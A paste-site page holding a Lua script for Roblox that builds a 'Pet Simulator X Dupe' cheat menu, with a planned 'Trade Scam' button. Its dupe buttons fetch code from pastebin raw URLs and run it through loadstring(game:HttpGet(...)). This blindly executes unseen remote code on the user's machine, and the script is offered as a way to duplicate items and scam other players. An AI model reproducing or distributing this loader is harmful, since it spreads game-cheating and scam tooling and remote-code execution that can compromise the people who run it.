Facebook
From Cream Leopard, 1 Year ago, written in Plain Text.
This paste is a reply to New Dupe Pets Method Works from Hacker Preston - view diff
Embed
Download Paste or View Raw
Hits: 374
  1. local ScreenGui = Instance.new("ScreenGui")
  2. local Frame = Instance.new("Frame")
  3. local line = Instance.new("Frame")
  4. local Frame_2 = Instance.new("Frame")
  5. local UICorner = Instance.new("UICorner")
  6. local dupemisc = Instance.new("TextLabel")
  7. local TextLabel = Instance.new("TextLabel")
  8. local UICorner_2 = Instance.new("UICorner")
  9. local newdupe = Instance.new("TextButton")
  10. local UICorner_3 = Instance.new("UICorner")
  11. local olddupe = Instance.new("TextButton")
  12. local UICorner_4 = Instance.new("UICorner")
  13. local timer = Instance.new("TextLabel")
  14. local n = Instance.new("TextButton")
  15. local UICorner_5 = Instance.new("UICorner")
  16. local misc = Instance.new("TextLabel")
  17. local dupesign = Instance.new("TextLabel")
  18.  
  19. ScreenGui.Parent = game.CoreGui
  20. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  21.  
  22. Frame.Parent = ScreenGui
  23. Frame.BackgroundColor3 = Color3.fromRGB(166, 143, 255)
  24. Frame.Position = UDim2.new(0.100236796, 0, 0.230110154, 0)
  25. Frame.Size = UDim2.new(0, 283, 0, 367)
  26. Frame.Active = true
  27. Frame.Draggable = true
  28.  
  29. line.Name = "line"
  30. line.Parent = Frame
  31. line.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  32. line.Position = UDim2.new(0, 0, 0.144414172, 0)
  33. line.Size = UDim2.new(0, 283, 0, 2)
  34.  
  35. Frame_2.Parent = Frame
  36. Frame_2.BackgroundColor3 = Color3.fromRGB(104, 90, 212)
  37. Frame_2.Position = UDim2.new(0.0247349832, 0, 0.0735694841, 0)
  38. Frame_2.Size = UDim2.new(0, 43, 0, 26)
  39.  
  40. UICorner.Parent = Frame_2
  41.  
  42. dupemisc.Name = "dupemisc"
  43. dupemisc.Parent = Frame
  44. dupemisc.BackgroundColor3 = Color3.fromRGB(104, 90, 212)
  45. dupemisc.BorderSizePixel = 0
  46. dupemisc.Position = UDim2.new(0, 7, 0.0900000036, 0)
  47. dupemisc.Size = UDim2.new(0, 43, 0, 19)
  48. dupemisc.Font = Enum.Font.GothamBlack
  49. dupemisc.Text = "Dupe"
  50. dupemisc.TextColor3 = Color3.fromRGB(0, 0, 0)
  51. dupemisc.TextSize = 14.000
  52.  
  53. TextLabel.Parent = Frame
  54. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  55. TextLabel.BackgroundTransparency = 1.000
  56. TextLabel.BorderSizePixel = 0
  57. TextLabel.Position = UDim2.new(0.0247349832, 0, 0, 0)
  58. TextLabel.Size = UDim2.new(0, 269, 0, 21)
  59. TextLabel.Font = Enum.Font.GothamBold
  60. TextLabel.Text = "Pet Simulator X Dupe - v2.8. zafu#5330"
  61. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  62. TextLabel.TextScaled = true
  63. TextLabel.TextSize = 14.000
  64. TextLabel.TextWrapped = true
  65.  
  66. UICorner_2.CornerRadius = UDim.new(0, 16)
  67. UICorner_2.Parent = Frame
  68.  
  69. newdupe.Name = "newdupe"
  70. newdupe.Parent = Frame
  71. newdupe.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  72. newdupe.Position = UDim2.new(0.0247349832, 0, 0.228882834, 0)
  73. newdupe.Size = UDim2.new(0, 269, 0, 29)
  74. newdupe.Visible = false
  75. newdupe.Font = Enum.Font.GothamBold
  76. newdupe.Text = "NEW UPDATED DUPE! (v2.8)"
  77. newdupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  78. newdupe.TextSize = 18.000
  79. newdupe.TextWrapped = true
  80. newdupe.MouseButton1Down:connect(function()
  81.         loadstring(game:HttpGet('https://pastebin.com/raw/00aKLfPk'))()
  82. end)
  83.  
  84. UICorner_3.Parent = newdupe
  85.  
  86. olddupe.Name = "olddupe"
  87. olddupe.Parent = Frame
  88. olddupe.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  89. olddupe.Position = UDim2.new(0.0247349832, 0, 0.340599447, 0)
  90. olddupe.Size = UDim2.new(0, 269, 0, 27)
  91. olddupe.Visible = false
  92. olddupe.Font = Enum.Font.GothamBold
  93. olddupe.Text = "OLD DUPE (v2.7)"
  94. olddupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  95. olddupe.TextSize = 18.000
  96. olddupe.TextWrapped = true
  97. olddupe.MouseButton1Down:connect(function()
  98.         loadstring(game:HttpGet('https://pastebin.com/raw/w6BUp12s'))()
  99. end)
  100.  
  101. UICorner_4.Parent = olddupe
  102.  
  103. timer.Name = "timer"
  104. timer.Parent = Frame
  105. timer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  106. timer.BackgroundTransparency = 1.000
  107. timer.BorderSizePixel = 0
  108. timer.Position = UDim2.new(0.0247349832, 0, 0.228882834, 0)
  109. timer.Size = UDim2.new(0, 269, 0, 61)
  110. timer.Font = Enum.Font.GothamBold
  111. timer.Text = "Dupe buttons will appear after 30 seconds to bypass bank cooldown."
  112. timer.TextColor3 = Color3.fromRGB(0, 0, 0)
  113. timer.TextScaled = true
  114. timer.TextSize = 14.000
  115. timer.TextWrapped = true
  116.  
  117. n.Name = "n"
  118. n.Parent = Frame
  119. n.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  120. n.Position = UDim2.new(0.0247349832, 0, 0.577656686, 0)
  121. n.Size = UDim2.new(0, 269, 0, 31)
  122. n.Font = Enum.Font.GothamBold
  123. n.Text = "Trade Scam (SOON)"
  124. n.TextColor3 = Color3.fromRGB(0, 0, 0)
  125. n.TextSize = 18.000
  126. n.TextWrapped = true
  127.  
  128. UICorner_5.Parent = n
  129.  
  130. misc.Name = "misc"
  131. misc.Parent = Frame
  132. misc.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  133. misc.BackgroundTransparency = 1.000
  134. misc.BorderSizePixel = 0
  135. misc.Position = UDim2.new(0.0247349832, 0, 0.493188024, 0)
  136. misc.Size = UDim2.new(0, 269, 0, 22)
  137. misc.Font = Enum.Font.GothamBold
  138. misc.Text = "MISC"
  139. misc.TextColor3 = Color3.fromRGB(0, 0, 0)
  140. misc.TextScaled = true
  141. misc.TextSize = 14.000
  142. misc.TextWrapped = true
  143.  
  144. dupesign.Name = "dupesign"
  145. dupesign.Parent = Frame
  146. dupesign.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  147. dupesign.BackgroundTransparency = 1.000
  148. dupesign.BorderSizePixel = 0
  149. dupesign.Position = UDim2.new(0.0247349832, 0, 0.168937355, 0)
  150. dupesign.Size = UDim2.new(0, 269, 0, 22)
  151. dupesign.Font = Enum.Font.GothamBold
  152. dupesign.Text = "DUPE"
  153. dupesign.TextColor3 = Color3.fromRGB(0, 0, 0)
  154. dupesign.TextScaled = true
  155. dupesign.TextSize = 14.000
  156. dupesign.TextWrapped = true
  157.  
  158. wait(30)
  159.  
  160. timer.Visible = false
  161. newdupe.Visible = true
  162. olddupe.Visible = true

Replies to Re: New Dupe Pets Method Works rss

Title Name Language When
Re: Re: New Dupe Pets Method Works Burly Armadillo text 1 Year ago.